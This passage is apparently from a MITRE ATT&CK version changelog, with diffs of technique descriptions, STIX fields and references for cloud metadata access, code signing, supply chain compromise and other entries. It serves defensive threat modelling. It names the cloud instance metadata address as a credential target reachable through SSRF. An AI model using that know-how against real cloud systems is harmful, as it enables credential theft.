>ant access to additional resources. Additionally, attackers >ant access to additional resources. Additionally, adversarie
>may exploit a Server-Side Request Forgery (SSRF) vulnerabili>s may exploit a Server-Side Request Forgery (SSRF) vulnerabi
>ty in a public facing web proxy that allows the attacker to >lity in a public facing web proxy that allows them to gain a
>gain access to the sensitive information via a request to th>ccess to the sensitive information via a request to the Inst
>e Instance Metadata API.(Citation: RedLock Instance Metadata>ance Metadata API.(Citation: RedLock Instance Metadata API 2
> API 2018)  The de facto standard across cloud service provi>018)  The de facto standard across cloud service providers i
>ders is to host the Instance Metadata API at <code>http[:]//>s to host the Instance Metadata API at <code>http[:]//169.25
>169.254.169.254</code>. >4.169.254</code>. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-03-31 19:41:06.948000+00:002022-03-08 21:37:23.589000+00:00
descriptionAdversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data. Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019) If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018) The de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254. Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data. Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019) If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018) The de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.
x_mitre_version1.21.3

[T1213.003] Data from Information Repositories: Code Repositories

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may leverage code repositories to collect valuabt1Adversaries may leverage code repositories to collect valuab
>le information. Code repositories are tools/services that st>le information. Code repositories are tools/services that st
>ore source code and automate software builds. They may be ho>ore source code and automate software builds. They may be ho
>sted internally or privately on third party sites such as Gi>sted internally or privately on third party sites such as Gi
>thub, GitLab, SourceForge, and BitBucket. Users typically in>thub, GitLab, SourceForge, and BitBucket. Users typically in
>teract with code repositories through a web application or c>teract with code repositories through a web application or c
>ommand-line utilities such as git.   Once adversaries gain a>ommand-line utilities such as git.  Once adversaries gain ac
>ccess to a victim network or a private code repository, they>cess to a victim network or a private code repository, they 
> may collect sensitive information such as proprietary sourc>may collect sensitive information such as proprietary source
>e code or credentials contained within software's source cod> code or credentials contained within software's source code
>e.  Having access to software's source code may allow advers>.  Having access to software's source code may allow adversa
>aries to develop [Exploits](https://attack.mitre.org/techniq>ries to develop [Exploits](https://attack.mitre.org/techniqu
>ues/T1587/004), while credentials may provide access to addi>es/T1587/004), while credentials may provide access to addit
>tional resources using [Valid Accounts](https://attack.mitre>ional resources using [Valid Accounts](https://attack.mitre.
>.org/techniques/T1078).(Citation: Wired Uber Breach)(Citatio>org/techniques/T1078).(Citation: Wired Uber Breach)(Citation
>n: Krebs Adobe)>: Krebs Adobe)  **Note:** This is distinct from [Code Reposi
 >tories](https://attack.mitre.org/techniques/T1593/003), whic
 >h focuses on conducting [Reconnaissance](https://attack.mitr
 >e.org/tactics/TA0043) via public code repositories.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 01:35:43.483000+00:002022-10-18 22:44:01.723000+00:00
descriptionAdversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe) **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
x_mitre_data_sources[0]Logon Session: Logon Session CreationApplication Log: Application Log Content
x_mitre_data_sources[1]Application Log: Application Log ContentLogon Session: Logon Session Creation
x_mitre_version1.01.1

[T1553.002] Subvert Trust Controls: Code Signing

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may create, acquire, or steal code signing matert1Adversaries may create, acquire, or steal code signing mater
>ials to sign their malware or tools. Code signing provides a>ials to sign their malware or tools. Code signing provides a
> level of authenticity on a binary from the developer and a > level of authenticity on a binary from the developer and a 
>guarantee that the binary has not been tampered with. (Citat>guarantee that the binary has not been tampered with. (Citat
>ion: Wikipedia Code Signing) The certificates used during an>ion: Wikipedia Code Signing) The certificates used during an
> operation may be created, acquired, or stolen by the advers> operation may be created, acquired, or stolen by the advers
>ary. (Citation: Securelist Digital Certificates) (Citation: >ary. (Citation: Securelist Digital Certificates) (Citation: 
>Symantec Digital Certificates) Unlike [Invalid Code Signatur>Symantec Digital Certificates) Unlike [Invalid Code Signatur
>e](https://attack.mitre.org/techniques/T1036/001), this acti>e](https://attack.mitre.org/techniques/T1036/001), this acti
>vity will result in a valid signature.  Code signing to veri>vity will result in a valid signature.  Code signing to veri
>fy software on first run can be used on modern Windows and m>fy software on first run can be used on modern Windows and m
>acOS/OS X systems. It is not used on Linux due to the decent>acOS systems. It is not used on Linux due to the decentraliz
>ralized nature of the platform. (Citation: Wikipedia Code Si>ed nature of the platform. (Citation: Wikipedia Code Signing
>gning)   Code signing certificates may be used to bypass sec>)(Citation: EclecticLightChecksonEXECodeSigning)  Code signi
>urity policies that require signed code to execute on a syst>ng certificates may be used to bypass security policies that
>em. > require signed code to execute on a system. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-02-10 19:51:01.601000+00:002022-09-22 19:13:52.548000+00:00
descriptionAdversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature. Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) Code signing certificates may be used to bypass security policies that require signed code to execute on a system. Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature. Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning) Code signing certificates may be used to bypass security policies that require signed code to execute on a system.
external_references[1]['source_name']Wikipedia Code SigningEclecticLightChecksonEXECodeSigning
external_references[1]['description']Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.Howard Oakley. (2020, November 16). Checks on executable code in Catalina and Big Sur: a first draft. Retrieved September 21, 2022.
external_references[1]['url']https://en.wikipedia.org/wiki/Code_signinghttps://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Wikipedia Code Signing', 'description': 'Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.', 'url': 'https://en.wikipedia.org/wiki/Code_signing'}

[T1059] Command and Scripting Interpreter

Current version: 2.3

Version changed from: 2.2 → 2.3

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-08-16 21:03:21.700000+00:002022-04-19 18:31:48.827000+00:00
external_references[1]['source_name']Powershell Remote CommandsRemote Shell Execution in Python
external_references[1]['description']Microsoft. (2020, August 21). Running Remote Commands. Retrieved July 26, 2021.Abdou Rockikz. (2020, July). How to Execute Shell Commands in a Remote Machine in Python. Retrieved July 26, 2021.
external_references[1]['url']https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python
external_references[3]['source_name']Remote Shell Execution in PythonPowershell Remote Commands
external_references[3]['description']Abdou Rockikz. (2020, July). How to Execute Shell Commands in a Remote Machine in Python. Retrieved July 26, 2021.Microsoft. (2020, August 21). Running Remote Commands. Retrieved July 26, 2021.
external_references[3]['url']https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-pythonhttps://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
x_mitre_data_sources[0]Command: Command ExecutionScript: Script Execution
x_mitre_data_sources[1]Process: Process CreationProcess: Process Metadata
x_mitre_data_sources[2]Module: Module LoadCommand: Command Execution
x_mitre_data_sources[3]Script: Script ExecutionModule: Module Load
x_mitre_version2.22.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1542.002] Pre-OS Boot: Component Firmware

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-23 23:48:33.904000+00:002022-04-01 20:43:55.632000+00:00
x_mitre_data_sources[1]Firmware: Firmware ModificationProcess: OS API Execution
x_mitre_data_sources[2]Process: OS API ExecutionFirmware: Firmware Modification
x_mitre_detectionData and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms. Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) disk monitoring may reveal malicious manipulations of components.(Citation: SanDisk SMART)(Citation: SmartMontools) Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms. Disk check and forensic utilities may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation.(Citation: ITWorld Hard Disk Health Dec 2014) Also consider comparing components, including hashes of component firmware and behavior, against known good images.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsLinux
x_mitre_platformsmacOS

[T1195.003] Supply Chain Compromise: Compromise Hardware Supply Chain

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_data_sources['Sensor Health: Host Status']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-23 12:51:45.475000+00:002022-04-28 16:05:10.755000+00:00
x_mitre_version1.01.1

[T1584] Compromise Infrastructure

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may compromise third-party infrastructure that ct1Adversaries may compromise third-party infrastructure that c
>an be used during targeting. Infrastructure solutions includ>an be used during targeting. Infrastructure solutions includ
>e physical or cloud servers, domains, and third-party web se>e physical or cloud servers, domains, and third-party web an
>rvices. Instead of buying, leasing, or renting infrastructur>d DNS services. Instead of buying, leasing, or renting infra
>e an adversary may compromise infrastructure and use it duri>structure an adversary may compromise infrastructure and use
>ng other phases of the adversary lifecycle.(Citation: Mandia> it during other phases of the adversary lifecycle.(Citation
>nt APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos>: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citatio
> DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) >n: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens 
>Additionally, adversaries may compromise numerous machines t>Part 2) Additionally, adversaries may compromise numerous ma
>o form a botnet they can leverage.  Use of compromised infra>chines to form a botnet they can leverage.  Use of compromis
>structure allows an adversary to stage, launch, and execute >ed infrastructure allows an adversary to stage, launch, and 
>an operation. Compromised infrastructure can help adversary >execute an operation. Compromised infrastructure can help ad
>operations blend in with traffic that is seen as normal, suc>versary operations blend in with traffic that is seen as nor
>h as contact with high reputation or trusted sites. By using>mal, such as contact with high reputation or trusted sites. 
> compromised infrastructure, adversaries may make it difficu>For example, adversaries may leverage compromised infrastruc
>lt to tie their actions back to them. Prior to targeting, ad>ture (potentially also in conjunction with [Digital Certific
>versaries may compromise the infrastructure of other adversa>ates](https://attack.mitre.org/techniques/T1588/004)) to fur
>ries.(Citation: NSA NCSC Turla OilRig)>ther blend in and support staged information gathering and/o
 >r [Phishing](https://attack.mitre.org/techniques/T1566) camp
 >aigns.(Citation: FireEye DNS Hijack 2019)   By using comprom
 >ised infrastructure, adversaries may make it difficult to ti
 >e their actions back to them. Prior to targeting, adversarie
 >s may compromise the infrastructure of other adversaries.(Ci
 >tation: NSA NCSC Turla OilRig)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Jeremy Galloway']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 16:01:48.871000+00:002022-07-26 23:33:26.352000+00:00
descriptionAdversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)
external_references[1]['source_name']Mandiant APT1FireEye DNS Hijack 2019
external_references[1]['description']Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020.
external_references[1]['url']https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdfhttps://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html
external_references[3]['source_name']Talos DNSpionage Nov 2018Koczwara Beacon Hunting Sep 2021
external_references[3]['description']Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020.Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.
external_references[3]['url']https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.htmlhttps://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
external_references[4]['source_name']FireEye EPS Awakens Part 2Mandiant APT1
external_references[4]['description']Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.
external_references[4]['url']https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.htmlhttps://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
external_references[5]['source_name']NSA NCSC Turla OilRigTalos DNSpionage Nov 2018
external_references[5]['description']NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020.Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020.
external_references[5]['url']https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdfhttps://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html
external_references[6]['source_name']ThreatConnect Infrastructure Dec 2020NSA NCSC Turla OilRig
external_references[6]['description']ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020.
external_references[6]['url']https://threatconnect.com/blog/infrastructure-research-hunting/https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf
external_references[8]['source_name']Koczwara Beacon Hunting Sep 2021ThreatConnect Infrastructure Dec 2020
external_references[8]['description']Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.
external_references[8]['url']https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2https://threatconnect.com/blog/infrastructure-research-hunting/
x_mitre_data_sources[0]Internet Scan: Response MetadataDomain Name: Domain Registration
x_mitre_data_sources[1]Internet Scan: Response ContentDomain Name: Passive DNS
x_mitre_data_sources[3]Domain Name: Passive DNSInternet Scan: Response Metadata
x_mitre_data_sources[4]Domain Name: Domain RegistrationInternet Scan: Response Content
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'FireEye EPS Awakens Part 2', 'description': 'Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.', 'url': 'https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html'}

[T1195.001] Supply Chain Compromise: Compromise Software Dependencies and Development Tools

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may manipulate software dependencies and developt1Adversaries may manipulate software dependencies and develop
>ment tools prior to receipt by a final consumer for the purp>ment tools prior to receipt by a final consumer for the purp
>ose of data or system compromise. Applications often depend >ose of data or system compromise. Applications often depend 
>on external software to function properly. Popular open sour>on external software to function properly. Popular open sour
>ce projects that are used as dependencies in many applicatio>ce projects that are used as dependencies in many applicatio
>ns may be targeted as a means to add malicious code to users>ns may be targeted as a means to add malicious code to users
> of the dependency. (Citation: Trendmicro NPM Compromise)   > of the dependency.(Citation: Trendmicro NPM Compromise)    
> Targeting may be specific to a desired victim set or may be>Targeting may be specific to a desired victim set or may be 
> distributed to a broad set of consumers but only move on to>distributed to a broad set of consumers but only move on to 
> additional tactics on specific victims. >additional tactics on specific victims. 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_data_sources['File: File Metadata']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-11 14:13:42.916000+00:002022-04-28 16:03:59.172000+00:00
descriptionAdversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise) Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise) Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.
x_mitre_version1.01.1

[T1195.002] Supply Chain Compromise: Compromise Software Supply Chain

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may manipulate application software prior to rect1Adversaries may manipulate application software prior to rec
>eipt by a final consumer for the purpose of data or system c>eipt by a final consumer for the purpose of data or system c
>ompromise. Supply chain compromise of software can take plac>ompromise. Supply chain compromise of software can take plac
>e in a number of ways, including manipulation of the applica>e in a number of ways, including manipulation of the applica
>tion source code, manipulation of the update/distribution me>tion source code, manipulation of the update/distribution me
>chanism for that software, or replacing compiled releases wi>chanism for that software, or replacing compiled releases wi
>th a modified version.  Targeting may be specific to a desir>th a modified version.  Targeting may be specific to a desir
>ed victim set or may be distributed to a broad set of consum>ed victim set or may be distributed to a broad set of consum
>ers but only move on to additional tactics on specific victi>ers but only move on to additional tactics on specific victi
>ms.(Citation: Avast CCleaner3 2018) (Citation: Command Five >ms.(Citation: Avast CCleaner3 2018)(Citation: Command Five S
>SK 2011)  >K 2011)  

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_data_sources['File: File Metadata']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-11 14:17:21.153000+00:002022-04-28 16:04:36.636000+00:00
descriptionAdversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version. Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version. Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011)
x_mitre_version1.01.1

[T1552.007] Unsecured Credentials: Container API

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

Dropped Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 18:20:31.636000+00:002022-04-01 13:11:10.849000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesUser Account: User Account Authentication
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesUser Account: User Account Authentication

[T1609] Container Administration Command

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 12:01:10.545000+00:002022-04-01 13:16:14.786000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1053.007] Scheduled Task/Job: Container Orchestration Job

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-07-27 17:38:17.146000+00:002022-04-01 13:06:58.794000+00:00
x_mitre_version1.11.2

[T1543] Create or Modify System Process

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may create or modify system-level processes to rt1Adversaries may create or modify system-level processes to r
>epeatedly execute malicious payloads as part of persistence.>epeatedly execute malicious payloads as part of persistence.
> When operating systems boot up, they can start processes th> When operating systems boot up, they can start processes th
>at perform background system functions. On Windows and Linux>at perform background system functions. On Windows and Linux
>, these system processes are referred to as services. (Citat>, these system processes are referred to as services.(Citati
>ion: TechNet Services) On macOS, launchd processes known as >on: TechNet Services) On macOS, launchd processes known as [
>[Launch Daemon](https://attack.mitre.org/techniques/T1543/00>Launch Daemon](https://attack.mitre.org/techniques/T1543/004
>4) and [Launch Agent](https://attack.mitre.org/techniques/T1>) and [Launch Agent](https://attack.mitre.org/techniques/T15
>543/001) are run to finish system initialization and load us>43/001) are run to finish system initialization and load use
>er specific parameters.(Citation: AppleDocs Launch Agent Dae>r specific parameters.(Citation: AppleDocs Launch Agent Daem
>mons)   Adversaries may install new services, daemons, or ag>ons)   Adversaries may install new services, daemons, or age
>ents that can be configured to execute at startup or a repea>nts that can be configured to execute at startup or a repeat
>table interval in order to establish persistence. Similarly,>able interval in order to establish persistence. Similarly, 
> adversaries may modify existing services, daemons, or agent>adversaries may modify existing services, daemons, or agents
>s to achieve the same effect.    Services, daemons, or agent> to achieve the same effect.    Services, daemons, or agents
>s may be created with administrator privileges but executed > may be created with administrator privileges but executed u
>under root/SYSTEM privileges. Adversaries may leverage this >nder root/SYSTEM privileges. Adversaries may leverage this f
>functionality to create or modify system processes in order >unctionality to create or modify system processes in order t
>to escalate privileges. (Citation: OSX Malware Detection).  >o escalate privileges.(Citation: OSX Malware Detection)  

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
